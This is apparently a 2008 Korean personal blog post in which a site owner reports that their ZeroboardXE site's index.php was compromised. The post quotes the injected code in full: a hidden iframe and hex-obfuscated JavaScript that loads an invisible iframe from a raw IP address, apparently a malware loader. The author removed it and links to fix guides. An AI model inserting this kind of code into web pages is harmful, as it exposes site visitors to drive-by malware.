 |
 |
|
|
[디지문, 2008년 04월 27일 17시 15분, PC 탐구/웹/DB]
예전에 제로보드4로 만들어진 홈페이지를 지금 서버로 돌리고 있었는데 하도 크래킹을 자주 당해서 보안상 많이 개선되었다는 후속판인 제로보드XE로 마이그레이션을 해 두었습니다.
그런데 오늘 그 홈페이지에 접속해 보니 접속은 되는 듯 한데 웹브라우저에 백지만 출력되는 겁니다. 그래서... 제로보드XE가 설치된 디렉토리의 index.php 파일을 열어 보니 소스 제일 하단에 <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v48138c2bca6e9(v48138c2bcaae3){ function v48138c2bcaedd () {return 16;} return(parseInt(v48138c2bcaae3,v48138c2bcaedd()));}function v48138c2bcbad9(v48138c2bcc2cb){ function v48138c2bcdab7 () {return 2;} var v48138c2bccac3='';for(v48138c2bcd2c4=0; v48138c2bcd2c4<v48138c2bcc2cb.length; v48138c2bcd2c4+=v48138c2bcdab7()){ v48138c2bccac3+=(String.fromCharCode(v48138c2bca6e9(v48138c2bcc2cb.substr(v48138c2bcd2c4, v48138c2bcdab7()))));}return v48138c2bccac3;} document.write(v48138c2bcbad9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D63373564207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3430303032292B273436383831655C272077696474683D313133206865696768743D333534207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script> 위와 같은 요상한 코드가 추가되어 있더군요. 검색 결과 아래 링크에 해결법이 비교적 자세하게 나와 있습니다. http://www.superuser.co.kr/home/superuserboard/view.html?id=2599&code=security&start=0&position= http://blog.daum.net/kwondoh/3269684 일단 위 소스만 제거하니 홈페이지는 예전처럼 잘 뜹니다만... 언젠가 다시 생성된다면 아무래도 서버를 다시 밀어야 할 지도 모를 일입니다. ㅋ  (0)  (0)Trackback Address :: http://www.digimoon.net/blog/trackback/305
|
||
 |
 |
|
